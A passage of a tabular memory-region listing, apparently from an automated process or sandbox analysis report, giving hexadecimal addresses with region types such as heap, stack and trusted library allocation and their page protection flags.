trusted library allocation
|
page read and write
|
||
1E42E1FC000
|
trusted library allocation
|
page read and write
|
||
1E42E23B000
|
trusted library allocation
|
page read and write
|
||
1E42B480000
|
heap
|
page read and write
|
||
1E7DDED5000
|
trusted library allocation
|
page read and write
|
||
1E7DDFE8000
|
trusted library allocation
|
page read and write
|
||
1E42E5A8000
|
trusted library allocation
|
page read and write
|
||
1E42E9AF000
|
trusted library allocation
|
page read and write
|
||
1E7DDFDF000
|
trusted library allocation
|
page read and write
|
||
1E7DDAA7000
|
trusted library allocation
|
page read and write
|
||
1E42E253000
|
trusted library allocation
|
page read and write
|
||
1E42F226000
|
trusted library allocation
|
page read and write
|
||
1E42DCD5000
|
trusted library allocation
|
page read and write
|
||
1E42ECDD000
|
trusted library allocation
|
page read and write
|
||
96534FE000
|
stack
|
page read and write
|
||
1E42F3E1000
|
trusted library allocation
|
page read and write
|
||
1E42F062000
|
trusted library allocation
|
page read and write
|
||
1E7DE569000
|
trusted library allocation
|
page read and write
|
||
1E42F065000
|
trusted library allocation
|
page read and write
|
||
1E7DDEB4000
|
trusted library allocation
|
page read and write
|
||
1E42F20E000
|
trusted library allocation
|
page read and write
|
||
1E7F4FD0000
|
heap
|
page read and write
|
||
1E42E718000
|
trusted library allocation
|
page read and write
|
||
1E42E20B000
|
trusted library allocation
|
page read and write
|
||
1E7DE3B1000
|
trusted library allocation
|
page read and write
|
||
1E42DE39000
|
trusted library allocation
|
page read and write
|
||
1E7DDDE0000
|
trusted library allocation
|
page read and write
|
||
1E7DE3BA000
|
trusted library allocation
|
page read and write
|
||
1E42F208000
|
trusted library allocation
|
page read and write
|
||
1E7DCAF1000
|
trusted library allocation
|
page read and write
|
||
1E42EB55000
|
trusted library allocation
|
page read and write
|
||
1E42E3AE000
|
trusted library allocation
|
page read and write
|
||
1E7DDDE3000
|
trusted library allocation
|
page read and write
|
||
1E7DAB70000
|
trusted library section
|
page read and write
|
||
1E42B336000
|
heap
|
page read and write
|
||
675DF3F000
|
stack
|
page read and write
|
||
1E42E3F6000
|
trusted library allocation
|
page read and write
|
||
1E42F3B4000
|
trusted library allocation
|
page read and write
|
||
1E42F083000
|
trusted library allocation
|
page read and write
|
||
1E7DE0E6000
|
trusted library allocation
|
page read and write
|
||
1E42F23E000
|
trusted library allocation
|
page read and write
|
||
1E42E5D8000
|
trusted library allocation
|
page read and write
|
||
1E7DDEC0000
|
trusted library allocation
|
page read and write
|
||
1E7DE11F000
|
trusted library allocation
|
page read and write
|
||
1E7DABE4000
|
heap
|
page read and write
|
||
1E7DE581000
|
trusted library allocation
|
page read and write
|
||
1E42E76C000
|
trusted library allocation
|
page read and write
|
||
1E7DDEBA000
|
trusted library allocation
|
page read and write
|
||
1E7DE122000
|
trusted library allocation
|
page read and write
|
||
1E42EB43000
|
trusted library allocation
|
page read and write
|
||
26C65015000
|
heap
|
page read and write
|
||
7FF83C760000
|
trusted library allocation
|
page read and write
|
||
965357E000
|
stack
|
page read and write
|
||
1E42F3D2000
|
trusted library allocation
|
page read and write
|
||
1E42E247000
|
trusted library allocation
|
page read and write
|
||
1E42DC81000
|
trusted library allocation
|
page read and write
|
||
1E7DE54E000
|
trusted library allocation
|
page read and write
|
||
1E7DE0E0000
|
trusted library allocation
|
page read and write
|
||
1E42F390000
|
trusted library allocation
|
page read and write
|
||
1E7DD4BE000
|
trusted library allocation
|
page read and write
|
||
1E42E71E000
|
trusted library allocation
|
page read and write
|
||
1E7DE110000
|
trusted library allocation
|
page read and write
|
||
1E42EB22000
|
trusted library allocation
|
page read and write
|
||
1E42DCB1000
|
trusted library allocation
|
page read and write
|
||
1E7DDCC1000
|
trusted library allocation
|
page read and write
|
||
1E42DE87000
|
trusted library allocation
|
page read and write
|
||
1E42E417000
|
trusted library allocation
|
page read and write
|
||
675F24D000
|
stack
|
page read and write
|
||
1E42E214000
|
trusted library allocation
|
page read and write
|
||
1E42E25F000
|
trusted library allocation
|
page read and write
|
||
1E42E727000
|
trusted library allocation
|
page read and write
|
||
1E42E3BA000
|
trusted library allocation
|
page read and write
|
||
1E7DE5A5000
|
trusted library allocation
|
page read and write
|
||
1E42EB4F000
|
trusted library allocation
|
page read and write
|
||
1E42E26B000
|
trusted library allocation
|
page read and write
|
||
1E42EE83000
|
trusted library allocation
|
page read and write
|
||
1E42EB70000
|
trusted library allocation
|
page read and write
|
||
1E42ECDA000
|
trusted library allocation
|
page read and write
|
||
1E7F4C66000
|
heap
|
page read and write
|
||
7FF83C7F0000
|
trusted library allocation
|
page read and write
|
||
1E42E9B8000
|
trusted library allocation
|
page read and write
|
||
1E42E018000
|
trusted library allocation
|
page read and write
|
||
7FF83C6A2000
|
trusted library allocation
|
page read and write
|
||
1E42F214000
|
trusted library allocation
|
page read and write
|
||
1E42EEC8000
|
trusted library allocation
|
page read and write
|
||
1E42E787000
|
trusted library allocation
|
page read and write
|
||
1E7DDEFC000
|
trusted library allocation
|
page read and write
|
||
1E42EEB9000
|
trusted library allocation
|
page read and write
|
||
1E42EB31000
|
trusted library allocation
|
page read and write
|
||
1E42DE24000
|
trusted library allocation
|
page read and write
|
||
1E42F1DE000
|
trusted library allocation
|
page read and write
|
||
1E42E973000
|
trusted library allocation
|
page read and write
|
||
1E42DE84000
|
trusted library allocation
|
page read and write
|
||
1E7DDDCB000
|
trusted library allocation
|
page read and write
|
||
1E7F4C3A000
|
heap
|
page read and write
|
||
1E7DDFD6000
|
trusted library allocation
|
page read and write
|
||
1E42DC69000
|
trusted library allocation
|
page read and write
|
||
1E7DDCB8000
|
trusted library allocation
|
page read and write
|
||
1E42ECC5000
|
trusted library allocation
|
page read and write
|
||
7FF83C730000
|
trusted library allocation
|
page read and write
|
||
1E42E946000
|
trusted library allocation
|
page read and write
|
||
1E42F235000
|
trusted library allocation
|
page read and write
|
||
1E42F03E000
|
trusted library allocation
|
page read and write
|
||
1E7F4A6B000
|
heap
|
page read and write
|
||
1E7DDCB2000
|
trusted library allocation
|
page read and write
|
||
1E42DC93000
|
trusted library allocation
|
page read and write
|
||
1E42E9B2000
|
trusted library allocation
|
page read and write
|
||
1E7DE235000
|
trusted library allocation
|
page read and write
|
||
1E7DABE0000
|
heap
|
page read and write
|
||
1E42F3BD000
|
trusted library allocation
|
page read and write
|
||
1E42ECC8000
|
trusted library allocation
|
page read and write
|
||
1E7DDDDA000
|
trusted library allocation
|
page read and write
|
||
1E42D2A1000
|
trusted library allocation
|
page read and write
|
||
1E42EB3A000
|
trusted library allocation
|
page read and write
|
||
1E42E5AE000
|
trusted library allocation
|
page read and write
|
||
1E42F1E4000
|
trusted library allocation
|
page read and write
|
||
1E42DFEE000
|
trusted library allocation
|
page read and write
|
||
C09E7CF000
|
stack
|
page read and write
|
||
1E42E232000
|
trusted library allocation
|
page read and write
|
||
1E42E9B5000
|
trusted library allocation
|
page read and write
|
||
1E7DDFF7000
|
trusted library allocation
|
page read and write
|
||
1E42F37E000
|
trusted library allocation
|
page read and write
|
||
1E42E560000
|
trusted library allocation
|
page read and write
|
||
7FF83C4DB000
|
trusted library allocation
|
page read and write
|
||
1E7DAA71000
|
heap
|
page read and write
|
||
1E7DDA8F000
|
trusted library allocation
|
page read and write
|
||
1E42DC75000
|
trusted library allocation
|
page read and write
|
||
1E42F07D000
|
trusted library allocation
|
page read and write
|
||
1E42F1E7000
|
trusted library allocation
|
page read and write
|
||
1E42F3C3000
|
trusted library allocation
|
page read and write
|
||
1E42ECE3000
|
trusted library allocation
|
page read and write
|
||
7FF83C7A0000
|
trusted library allocation
|
page read and write
|
||
7FF83C840000
|
trusted library allocation
|
page read and write
|
||
1E42DFDC000
|
trusted library allocation
|
page read and write
|
||
1E42E405000
|
trusted library allocation
|
page read and write
|
||
1E42F023000
|
trusted library allocation
|
page read and write
|
||
1E7DDA8C000
|
trusted library allocation
|
page read and write
|
||
1E42EE89000
|
trusted library allocation
|
page read and write
|
||
1E42E769000
|
trusted library allocation
|
page read and write
|
||
1E7DA910000
|
heap
|
page read and write
|
||
1E42E00F000
|
trusted library allocation
|
page read and write
|
||
1E42D0D0000
|
trusted library allocation
|
page read and write
|
||
1E42DE3F000
|
trusted library allocation
|
page read and write
|
||
1E43D45C000
|
trusted library allocation
|
page read and write
|
||
7FF83C740000
|
trusted library allocation
|
page read and write
|
||
1E7DE3D2000
|
trusted library allocation
|
page read and write
|
||
1E42B5B0000
|
heap
|
page read and write
|
||
1E42B530000
|
heap
|
page execute and read and write
|
||
1E4453F0000
|
heap
|
page execute and read and write
|
||
1E7DE229000
|
trusted library allocation
|
page read and write
|
||
7FF83C800000
|
trusted library allocation
|
page read and write
|
||
1E42DE60000
|
trusted library allocation
|
page read and write
|
||
1E7DDDC8000
|
trusted library allocation
|
page read and write
|
||
1E42E402000
|
trusted library allocation
|
page read and write
|
||
1E42F39C000
|
trusted library allocation
|
page read and write
|
||
1E42E21D000
|
trusted library allocation
|
page read and write
|
||
1E7DDDBF000
|
trusted library allocation
|
page read and write
|
||
1E7DDFD0000
|
trusted library allocation
|
page read and write
|
||
1E7DDDBC000
|
trusted library allocation
|
page read and write
|
||
1E7DDAA1000
|
trusted library allocation
|
page read and write
|
||
1E7DE00C000
|
trusted library allocation
|
page read and write
|
||
1E42EB46000
|
trusted library allocation
|
page read and write
|
||
1E7DE00F000
|
trusted library allocation
|
page read and write
|
||
1E42ECF2000
|
trusted library allocation
|
page read and write
|
||
1E42E57E000
|
trusted library allocation
|
page read and write
|
||
1E42EB19000
|
trusted library allocation
|
page read and write
|
||
1E7DE006000
|
trusted library allocation
|
page read and write
|
||
965347E000
|
stack
|
page read and write
|
||
7FF83C7A0000
|
trusted library allocation
|
page read and write
|
||
1E42E991000
|
trusted library allocation
|
page read and write
|
||
1E42E742000
|
trusted library allocation
|
page read and write
|
||
1E7DE125000
|
trusted library allocation
|
page read and write
|
||
1E7DE3D8000
|
trusted library allocation
|
page read and write
|
||
1E7DE399000
|
trusted library allocation
|
page read and write
|
||
1E42E775000
|
trusted library allocation
|
page read and write
|
||
1E42DE6F000
|
trusted library allocation
|
page read and write
|
||
1E42B560000
|
heap
|
page read and write
|
||
1E7DE3C9000
|
trusted library allocation
|
page read and write
|
||
1E42E599000
|
trusted library allocation
|
page read and write
|
||
1E7F4AAA000
|
heap
|
page read and write
|
||
1E42E3D2000
|
trusted library allocation
|
page read and write
|
||
1E7DDEE4000
|
trusted library allocation
|
page read and write
|
||
1E42D326000
|
trusted library allocation
|
page read and write
|
||
1E42E96A000
|
trusted library allocation
|
page read and write
|
||
1E7F4C5D000
|
heap
|
page read and write
|
||
7FF83C770000
|
trusted library allocation
|
page read and write
|
||
7FF83C690000
|
trusted library allocation
|
page read and write
|
||
1E42F1FC000
|
trusted library allocation
|
page read and write
|
||
1E42F229000
|
trusted library allocation
|
page read and write
|
||
1E42EEA7000
|
trusted library allocation
|
page read and write
|
||
1E7F4A1D000
|
heap
|
page read and write
|
||
1E4455B4000
|
heap
|
page read and write
|
||
1E7DDA71000
|
trusted library allocation
|
page read and write
|
||
1E7DD5B0000
|
trusted library allocation
|
page read and write
|
||
675E07C000
|
stack
|
page read and write
|
||
1E42DE36000
|
trusted library allocation
|
page read and write
|
||
1E42EE7D000
|
trusted library allocation
|
page read and write
|
||
1E42E25C000
|
trusted library allocation
|
page read and write
|
||
1E42F02C000
|
trusted library allocation
|
page read and write
|
||
1E42E5CC000
|
trusted library allocation
|
page read and write
|
||
1E42E420000
|
trusted library allocation
|
page read and write
|
||
1E42E5C0000
|
trusted library allocation
|
page read and write
|
||
26C64F70000
|
heap
|
page read and write
|
||
1E42DC6F000
|
trusted library allocation
|
page read and write
|
||
1E7DDEF3000
|
trusted library allocation
|
page read and write
|
||
1E7DE3E4000
|
trusted library allocation
|
page read and write
|
||
1E42E3CC000
|
trusted library allocation
|
page read and write
|
||
1E7DE20E000
|
trusted library allocation
|
page read and write
|
||
1E42E5B1000
|
trusted library allocation
|
page read and write
|
||
1E42F3DB000
|
trusted library allocation
|
page read and write
|
||
1E7DC543000
|
trusted library allocation
|
page read and write
|
||
1E42E8BB000
|
trusted library allocation
|
page read and write
|
||
1E7DD7DF000
|
trusted library allocation
|
page read and write
|
||
7FF83C770000
|
trusted library allocation
|
page read and write
|
||
1E42B564000
|
heap
|
page read and write
|
||
1E7DDEF6000
|
trusted library allocation
|
page read and write
|
||
1E7DE232000
|
trusted library allocation
|
page read and write
|
||
7FF83C750000
|
trusted library allocation
|
page read and write
|
||
1E42EEC5000
|
trusted library allocation
|
page read and write
|
||
7FF83C780000
|
trusted library allocation
|
page read and write
|
||
675E53F000
|
stack
|
page read and write
|
||
1E42DE7B000
|
trusted library allocation
|
page read and write
|
||
1E7DDBB7000
|
trusted library allocation
|
page read and write
|
||
1E42F3C9000
|
trusted library allocation
|
page read and write
|
||
1E42DFE8000
|
trusted library allocation
|
page read and write
|
||
1E42EE80000
|
trusted library allocation
|
page read and write
|
||
1E42F3B7000
|
trusted library allocation
|
page read and write
|
||
1E7DE56F000
|
trusted library allocation
|
page read and write
|
||
1E7DE3AE000
|
trusted library allocation
|
page read and write
|
||
1E42E000000
|
trusted library allocation
|
page read and write
|
||
1E42F08F000
|
trusted library allocation
|
page read and write
|
||
1E42EE8C000
|
trusted library allocation
|
page read and write
|
||
1E7DE3B4000
|
trusted library allocation
|
page read and write
|
||
1E42E97C000
|
trusted library allocation
|
page read and write
|
||
965480D000
|
stack
|
page read and write
|
||
1E7DE3AB000
|
trusted library allocation
|
page read and write
|
||
1E42E211000
|
trusted library allocation
|
page read and write
|
||
1E7DDA5C000
|
trusted library allocation
|
page read and write
|
||
1E42E00C000
|
trusted library allocation
|
page read and write
|
||
1E42E208000
|
trusted library allocation
|
page read and write
|
||
1E7F4AA5000
|
heap
|
page read and write
|
||
1E42B3A4000
|
heap
|
page read and write
|
||
1E7DE58A000
|
trusted library allocation
|
page read and write
|
||
1E42F04D000
|
trusted library allocation
|
page read and write
|
||
675E17E000
|
stack
|
page read and write
|
||
1E42B590000
|
heap
|
page execute and read and write
|
||
1E42D63C000
|
trusted library allocation
|
page read and write
|
||
1E42DE4B000
|
trusted library allocation
|
page read and write
|
||
9653A7E000
|
stack
|
page read and write
|
||
1E42F396000
|
trusted library allocation
|
page read and write
|
||
1E7DE23E000
|
trusted library allocation
|
page read and write
|
||
1E7DDED2000
|
trusted library allocation
|
page read and write
|
||
7FF83C5D6000
|
trusted library allocation
|
page execute and read and write
|
||
1E42F3D8000
|
trusted library allocation
|
page read and write
|
||
1E7DD8E3000
|
trusted library allocation
|
page read and write
|
||
1E42F01A000
|
trusted library allocation
|
page read and write
|
||
1E42EECE000
|
trusted library allocation
|
page read and write
|
||
1E43D2A1000
|
trusted library allocation
|
page read and write
|
||
1E42DC9F000
|
trusted library allocation
|
page read and write
|
||
1E7DC4F0000
|
heap
|
page execute and read and write
|
||
1E42F241000
|
trusted library allocation
|
page read and write
|
||
1E42E9A6000
|
trusted library allocation
|
page read and write
|
||
1E7DE59C000
|
trusted library allocation
|
page read and write
|
||
1E42F38A000
|
trusted library allocation
|
page read and write
|
||
1E42EB0A000
|
trusted library allocation
|
page read and write
|
||
7FF83C820000
|
trusted library allocation
|
page read and write
|
||
26C64FB0000
|
heap
|
page read and write
|
||
7FF83C820000
|
trusted library allocation
|
page read and write
|
||
1E42F3A2000
|
trusted library allocation
|
page read and write
|
||
1E42E5D5000
|
trusted library allocation
|
page read and write
|
||
1E42E74E000
|
trusted library allocation
|
page read and write
|
||
1E42EED7000
|
trusted library allocation
|
page read and write
|
||
1E42E01E000
|
trusted library allocation
|
page read and write
|
||
1E7DDEDE000
|
trusted library allocation
|
page read and write
|
||
1E42E563000
|
trusted library allocation
|
page read and write
|
||
1E7DE0F2000
|
trusted library allocation
|
page read and write
|
||
1E7DD97F000
|
trusted library allocation
|
page read and write
|
||
1E445910000
|
heap
|
page read and write
|
||
9653183000
|
stack
|
page read and write
|
||
7FF83C4F2000
|
trusted library allocation
|
page read and write
|
||
1E7DA980000
|
heap
|
page read and write
|
||
1E42F3F9000
|
trusted library allocation
|
page read and write
|
||
1E42DE8A000
|
trusted library allocation
|
page read and write
|
||
1E42EB2B000
|
trusted library allocation
|
page read and write
|
||
1E7DE596000
|
trusted library allocation
|
page read and write
|
||
1E7DAA7C000
|
heap
|
page read and write
|
||
1E42E3BD000
|
trusted library allocation
|
page read and write
|
||
1E42ECFE000
|
trusted library allocation
|
page read and write
|
||
1E7DD58F000
|
trusted library allocation
|
page read and write
|
||
1E7DDFF1000
|
trusted library allocation
|
page read and write
|
||
1E42E724000
|
trusted library allocation
|
page read and write
|
||
1E42DE21000
|
trusted library allocation
|
page read and write
|
||
1E7DD31F000
|
trusted library allocation
|
page read and write
|
||
1E42E949000
|
trusted library allocation
|
page read and write
|
||
1E42E94F000
|
trusted library allocation
|
page read and write
|
||
7FF83C810000
|
trusted library allocation
|
page read and write
|
||
1E7DDAA4000
|
trusted library allocation
|
page read and write
|
||
1E7DDA95000
|
trusted library allocation
|
page read and write
|
||
1E42F086000
|
trusted library allocation
|
page read and write
|
||
1E7DDB9C000
|
trusted library allocation
|
page read and write
|
||
1E42F393000
|
trusted library allocation
|
page read and write
|
||
1E7DDFCD000
|
trusted library allocation
|
page read and write
|
||
1E42ED0D000
|
trusted library allocation
|
page read and write
|
||
1E7DDDE9000
|
trusted library allocation
|
page read and write
|
||
1E7DE1F6000
|
trusted library allocation
|
page read and write
|
||
1E7DE3CC000
|
trusted library allocation
|
page read and write
|
||
1E7EC930000
|
trusted library allocation
|
page read and write
|
||
1E42E955000
|
trusted library allocation
|
page read and write
|
||
1E4455D0000
|
heap
|
page read and write
|
||
1E42E262000
|
trusted library allocation
|
page read and write
|
||
1E42DE81000
|
trusted library allocation
|
page read and write
|
||
1E42E03C000
|
trusted library allocation
|
page read and write
|
||
1E7DE560000
|
trusted library allocation
|
page read and write
|
||
1E7DD7BE000
|
trusted library allocation
|
page read and write
|
||
1E42E26E000
|
trusted library allocation
|
page read and write
|
||
1E42D4C7000
|
trusted library allocation
|
page read and write
|
||
1E42E41A000
|
trusted library allocation
|
page read and write
|
||
1E42F035000
|
trusted library allocation
|
page read and write
|
||
1E7DD350000
|
trusted library allocation
|
page read and write
|
||
1E7DDFE2000
|
trusted library allocation
|
page read and write
|
||
1E42EE9B000
|
trusted library allocation
|
page read and write
|
||
1E42F205000
|
trusted library allocation
|
page read and write
|
||
1E42EB58000
|
trusted library allocation
|
page read and write
|
||
1E42DCDB000
|
trusted library allocation
|
page read and write
|
||
1E42F06E000
|
trusted library allocation
|
page read and write
|
||
7FF83C7B0000
|
trusted library allocation
|
page read and write
|
||
7DF436360000
|
trusted library allocation
|
page execute and read and write
|
||
1E7DDCA6000
|
trusted library allocation
|
page read and write
|
||
1E42B2FA000
|
heap
|
page read and write
|
||
1E42F387000
|
trusted library allocation
|
page read and write
|
||
1E42E95B000
|
trusted library allocation
|
page read and write
|
||
26C64E90000
|
heap
|
page read and write
|
||
1E42ED10000
|
trusted library allocation
|
page read and write
|
||
7FF83C6D2000
|
trusted library allocation
|
page read and write
|
||
1E7DE202000
|
trusted library allocation
|
page read and write
|
||
7FF83C5E0000
|
trusted library allocation
|
page execute and read and write
|
||
1E42E039000
|
trusted library allocation
|
page read and write
|
||
1E42E166000
|
trusted library allocation
|
page read and write
|
||
7FF83C580000
|
trusted library allocation
|
page execute and read and write
|
||
1E42E71B000
|
trusted library allocation
|
page read and write
|
||
96545CE000
|
stack
|
page read and write
|
||
1E7DCC2B000
|
trusted library allocation
|
page read and write
|
||
1E7DE551000
|
trusted library allocation
|
page read and write
|
||
1E7DDEDB000
|
trusted library allocation
|
page read and write
|
||
1E7DD598000
|
trusted library allocation
|
page read and write
|
||
1E42E99D000
|
trusted library allocation
|
page read and write
|
||
1E7DDA9E000
|
trusted library allocation
|
page read and write
|
||
1E42E997000
|
trusted library allocation
|
page read and write
|
||
1E42E566000
|
trusted library allocation
|
page read and write
|
||
1E42B2B0000
|
heap
|
page read and write
|
||
1E42B2C2000
|
heap
|
page read and write
|
||
1E7DE223000
|
trusted library allocation
|
page read and write
|
||
1E7DDCA0000
|
trusted library allocation
|
page read and write
|
||
1E42EE92000
|
trusted library allocation
|
page read and write
|
||
1E7DD33A000
|
trusted library allocation
|
page read and write
|
||
1E42E5B7000
|
trusted library allocation
|
page read and write
|
||
1E42E739000
|
trusted library allocation
|
page read and write
|
||
1E7DE21D000
|
trusted library allocation
|
page read and write
|
||
1E42E757000
|
trusted library allocation
|
page read and write
|
||
1E42F06B000
|
trusted library allocation
|
page read and write
|
||
1E42E958000
|
trusted library allocation
|
page read and write
|
||
1E42E3D8000
|
trusted library allocation
|
page read and write
|
||
1E42E569000
|
trusted library allocation
|
page read and write
|
||
1E42E21A000
|
trusted library allocation
|
page read and write
|
||
1E42E414000
|
trusted library allocation
|
page read and write
|
||
1E42E3F3000
|
trusted library allocation
|
page read and write
|
||
7FF83C750000
|
trusted library allocation
|
page read and write
|
||
1E7DE57B000
|
trusted library allocation
|
page read and write
|
||
1E42E763000
|
trusted library allocation
|
page read and write
|
||
1E42F1CC000
|
trusted library allocation
|
page read and write
|
||
1E7DABA0000
|
trusted library allocation
|
page read and write
|
||
675E1FD000
|
stack
|
page read and write
|
||
1E42ECB0000
|
trusted library allocation
|
page read and write
|
||
1E7DA970000
|
trusted library section
|
page read and write
|
||
7FF83C5A0000
|
trusted library allocation
|
page read and write
|
||
1E42B240000
|
heap
|
page read and write
|
||
7FF83C710000
|
trusted library allocation
|
page read and write
|
||
1E7DE101000
|
trusted library allocation
|
page read and write
|
||
1E7DE557000
|
trusted library allocation
|
page read and write
|
||
1E42F074000
|
trusted library allocation
|
page read and write
|
||
965454E000
|
stack
|
page read and write
|
||
1E42E3AB000
|
trusted library allocation
|
page read and write
|
||
1E42E41D000
|
trusted library allocation
|
page read and write
|
||
1E7F4ABA000
|
heap
|
page read and write
|
||
1E42F238000
|
trusted library allocation
|
page read and write
|
||
1E7DDEE7000
|
trusted library allocation
|
page read and write
|
||
1E42F03B000
|
trusted library allocation
|
page read and write
|
||
1E42F1EA000
|
trusted library allocation
|
page read and write
|
||
1E7DDBBA000
|
trusted library allocation
|
page read and write
|
||
1E7DDDD1000
|
trusted library allocation
|
page read and write
|
||
1E42F1D5000
|
trusted library allocation
|
page read and write
|
||
1E42F202000
|
trusted library allocation
|
page read and write
|
||
7FF83C576000
|
trusted library allocation
|
page read and write
|
||
1E7DDEC3000
|
trusted library allocation
|
page read and write
|
||
1E42DFFA000
|
trusted library allocation
|
page read and write
|
||
1E42E3E7000
|
trusted library allocation
|
page read and write
|
||
1E42F1FF000
|
trusted library allocation
|
page read and write
|
||
1E42E3FF000
|
trusted library allocation
|
page read and write
|
||
1E7DABEB000
|
heap
|
page read and write
|
||
7FF83C720000
|
trusted library allocation
|
page read and write
|
||
1E42E3ED000
|
trusted library allocation
|
page read and write
|
||
1E42ED16000
|
trusted library allocation
|
page read and write
|
||
1E42EB10000
|
trusted library allocation
|
page read and write
|
||
1E42E256000
|
trusted library allocation
|
page read and write
|
||
1E7DE3F0000
|
trusted library allocation
|
page read and write
|
||
7FF83C570000
|
trusted library allocation
|
page read and write
|
||
1E42DC8D000
|
trusted library allocation
|
page read and write
|
||
675DEFE000
|
stack
|
page read and write
|
||
1E42F01D000
|
trusted library allocation
|
page read and write
|
||
7FF83C700000
|
trusted library allocation
|
page read and write
|
||
1E42E1F6000
|
trusted library allocation
|
page read and write
|
||
1E42E3FC000
|
trusted library allocation
|
page read and write
|
||
1E42E40B000
|
trusted library allocation
|
page read and write
|
||
1E7DAA6F000
|
heap
|
page read and write
|
||
1E42E9AC000
|
trusted library allocation
|
page read and write
|
||
1E7DE0EC000
|
trusted library allocation
|
page read and write
|
||
1E42E97F000
|
trusted library allocation
|
page read and write
|
||
1E4452E0000
|
heap
|
page read and write
|
||
1E42E3EA000
|
trusted library allocation
|
page read and write
|
||
1E42DC7B000
|
trusted library allocation
|
page read and write
|
||
7FF83C4C3000
|
trusted library allocation
|
page execute and read and write
|
||
1E42DE45000
|
trusted library allocation
|
page read and write
|
||
1E42DE5A000
|
trusted library allocation
|
page read and write
|
||
7FF83C700000
|
trusted library allocation
|
page read and write
|
||
1E42E95E000
|
trusted library allocation
|
page read and write
|
||
1E7DDA86000
|
trusted library allocation
|
page read and write
|
||
1E44532D000
|
heap
|
page read and write
|
||
1E42DCA5000
|
trusted library allocation
|
page read and write
|
||
1E7DDEF0000
|
trusted library allocation
|
page read and write
|
||
1E42E8B7000
|
trusted library allocation
|
page read and write
|
||
1E42EB1C000
|
trusted library allocation
|
page read and write
|
||
1E42F077000
|
trusted library allocation
|
page read and write
|
||
1E42EEC2000
|
trusted library allocation
|
page read and write
|
||
1E42F3A5000
|
trusted library allocation
|
page read and write
|
||
1E42F232000
|
trusted library allocation
|
page read and write
|
||
1E7DE226000
|
trusted library allocation
|
page read and write
|
||
1E42DFF1000
|
trusted library allocation
|
page read and write
|
||
1E42ECE6000
|
trusted library allocation
|
page read and write
|
||
1E7DD973000
|
trusted library allocation
|
page read and write
|
||
1E42EE68000
|
trusted library allocation
|
page read and write
|
||
1E42EB0D000
|
trusted library allocation
|
page read and write
|
||
1E7DE599000
|
trusted library allocation
|
page read and write
|
||
1E42DE63000
|
trusted library allocation
|
page read and write
|
||
1E7DC93C000
|
trusted library allocation
|
page read and write
|
||
1E7DDFE5000
|
trusted library allocation
|
page read and write
|
||
1E42DE48000
|
trusted library allocation
|
page read and write
|
||
1E42ED13000
|
trusted library allocation
|
page read and write
|
||
1E42DE69000
|
trusted library allocation
|
page read and write
|
||
1E7DDBA8000
|
trusted library allocation
|
page read and write
|
||
1E7DE3EA000
|
trusted library allocation
|
page read and write
|
||
1E42DE2A000
|
trusted library allocation
|
page read and write
|
||
1E7F4BF0000
|
heap
|
page read and write
|
||
1E42EB01000
|
trusted library allocation
|
page read and write
|
||
1E42EB67000
|
trusted library allocation
|
page read and write
|
||
1E7DDFCA000
|
trusted library allocation
|
page read and write
|
||
7FF83C800000
|
trusted library allocation
|
page read and write
|
||
1E42E77B000
|
trusted library allocation
|
page read and write
|
||
1E42ECC2000
|
trusted library allocation
|
page read and write
|
||
1E42DE1E000
|
trusted library allocation
|
page read and write
|
||
1E7DDCC4000
|
trusted library allocation
|
page read and write
|
||
1E42E02A000
|
trusted library allocation
|
page read and write
|
||
1E42ECB6000
|
trusted library allocation
|
page read and write
|
||
1E42E3B4000
|
trusted library allocation
|
page read and write
|
||
1E7DDCBE000
|
trusted library allocation
|
page read and write
|
||
1E7DA9C7000
|
heap
|
page read and write
|
||
7FF83C662000
|
trusted library allocation
|
page read and write
|
||
7FF83C5A6000
|
trusted library allocation
|
page read and write
|
||
1E42ECAD000
|
trusted library allocation
|
page read and write
|
||
1E7DDDCE000
|
trusted library allocation
|
page read and write
|
||
1E42E01B000
|
trusted library allocation
|
page read and write
|
||
1E7DE572000
|
trusted library allocation
|
page read and write
|
||
1E7DABB0000
|
heap
|
page readonly
|
||
7FF83C7E0000
|
trusted library allocation
|
page read and write
|
||
1E42EB16000
|
trusted library allocation
|
page read and write
|
||
965367E000
|
stack
|
page read and write
|
||
1E42F3E4000
|
trusted library allocation
|
page read and write
|
||
1E42E9A9000
|
trusted library allocation
|
page read and write
|
||
1E42F3AE000
|
trusted library allocation
|
page read and write
|
||
1E42F38D000
|
trusted library allocation
|
page read and write
|
||
1E42E235000
|
trusted library allocation
|
page read and write
|
||
1E42D637000
|
trusted library allocation
|
page read and write
|
||
1E7DE238000
|
trusted library allocation
|
page read and write
|
||
1E42E967000
|
trusted library allocation
|
page read and write
|
||
1E42E030000
|
trusted library allocation
|
page read and write
|
||
1E7F4C33000
|
heap
|
page read and write
|
||
1E7DDEE1000
|
trusted library allocation
|
page read and write
|
||
1E42DE42000
|
trusted library allocation
|
page read and write
|
||
1E42E23E000
|
trusted library allocation
|
page read and write
|
||
7FF83C7B0000
|
trusted library allocation
|
page read and write
|
||
1E7DE563000
|
trusted library allocation
|
page read and write
|
||
1E42E590000
|
trusted library allocation
|
page read and write
|
||
1E42E943000
|
trusted library allocation
|
page read and write
|
||
1E7DE220000
|
trusted library allocation
|
page read and write
|
||
1E7DAB80000
|
trusted library allocation
|
page read and write
|
||
1E42E778000
|
trusted library allocation
|
page read and write
|
||
1E7DE56C000
|
trusted library allocation
|
page read and write
|
||
1E42E220000
|
trusted library allocation
|
page read and write
|
||
1E42E59C000
|
trusted library allocation
|
page read and write
|
||
1E42EEA1000
|
trusted library allocation
|
page read and write
|
||
7FF83C6F0000
|
trusted library allocation
|
page read and write
|
||
1E42DC87000
|
trusted library allocation
|
page read and write
|
||
1E42ED0A000
|
trusted library allocation
|
page read and write
|
||
1E42EB37000
|
trusted library allocation
|
page read and write
|
||
7FF83C79F000
|
trusted library allocation
|
page read and write
|
||
1E42E78A000
|
trusted library allocation
|
page read and write
|
||
1E42B4E0000
|
heap
|
page readonly
|
||
1E42DE51000
|
trusted library allocation
|
page read and write
|
||
1E7DE3C6000
|
trusted library allocation
|
page read and write
|
||
1E42E229000
|
trusted library allocation
|
page read and write
|
||
1E7DA900000
|
heap
|
page read and write
|
||
1E7DC576000
|
heap
|
page read and write
|
||
1E7EC8C1000
|
trusted library allocation
|
page read and write
|
||
1E42F041000
|
trusted library allocation
|
page read and write
|
||
1E42E250000
|
trusted library allocation
|
page read and write
|
||
1E7DE57E000
|
trusted library allocation
|
page read and write
|
||
7FF83C7D0000
|
trusted library allocation
|
page read and write
|
||
1E42F3C6000
|
trusted library allocation
|
page read and write
|
||
1E42DE54000
|
trusted library allocation
|
page read and write
|
||
1E42F223000
|
trusted library allocation
|
page read and write
|
||
1E42EEBF000
|
